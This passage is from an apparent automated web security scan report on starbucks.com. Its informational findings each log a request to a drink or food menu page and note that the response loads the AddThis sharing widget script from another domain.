Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:09 GMT
Connection: close
Content-Length: 42374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.167. http://www.starbucks.com/menu/drinks/tazo-tea/green-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/green-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/green-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:11 GMT
Connection: close
Content-Length: 42113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.168. http://www.starbucks.com/menu/drinks/tazo-tea/iced-awake-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-awake-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-awake-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:11 GMT
Connection: close
Content-Length: 42104

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.169. http://www.starbucks.com/menu/drinks/tazo-tea/iced-chai-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-chai-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-chai-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:28 GMT
Connection: close
Content-Length: 42063

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.170. http://www.starbucks.com/menu/drinks/tazo-tea/iced-green-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/iced-green-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/iced-green-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:50 GMT
Connection: close
Content-Length: 41987

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.171. http://www.starbucks.com/menu/drinks/tazo-tea/orange-blossom

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/orange-blossom

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/orange-blossom HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:37:56 GMT
Connection: close
Content-Length: 42225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.172. http://www.starbucks.com/menu/drinks/tazo-tea/passion

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/passion

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/passion HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:01 GMT
Connection: close
Content-Length: 42130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.173. http://www.starbucks.com/menu/drinks/tazo-tea/refresh

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/refresh

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/refresh HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:00 GMT
Connection: close
Content-Length: 42165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.174. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-black-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:36:00 GMT
Connection: close
Content-Length: 42106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.175. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:18 GMT
Connection: close
Content-Length: 41917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.176. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-green-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:21 GMT
Connection: close
Content-Length: 42049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.177. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:22 GMT
Connection: close
Content-Length: 41971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.178. http://www.starbucks.com/menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/shaken-iced-passion-tea-lemonade HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:24 GMT
Connection: close
Content-Length: 42146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.179. http://www.starbucks.com/menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/tazo-vanilla-rooibos-brewed-tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:41 GMT
Connection: close
Content-Length: 41931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.180. http://www.starbucks.com/menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/vanilla-roobios-tea-latte

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/vanilla-roobios-tea-latte HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:51 GMT
Connection: close
Content-Length: 42328

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.181. http://www.starbucks.com/menu/drinks/tazo-tea/zen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/tazo-tea/zen

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/tazo-tea/zen HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:38:55 GMT
Connection: close
Content-Length: 41944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.182. http://www.starbucks.com/menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/chocolate-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:14 GMT
Connection: close
Content-Length: 41069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.183. http://www.starbucks.com/menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/orange-mango-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:23 GMT
Connection: close
Content-Length: 40848

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.184. http://www.starbucks.com/menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/vivanno-smoothies/strawberry-vivanno-smoothie HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:21 GMT
Connection: close
Content-Length: 41344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.185. http://www.starbucks.com/menu/food

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:39:48 GMT
Connection: close
Content-Length: 59118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.186. http://www.starbucks.com/menu/food/bakery/8-grain-roll

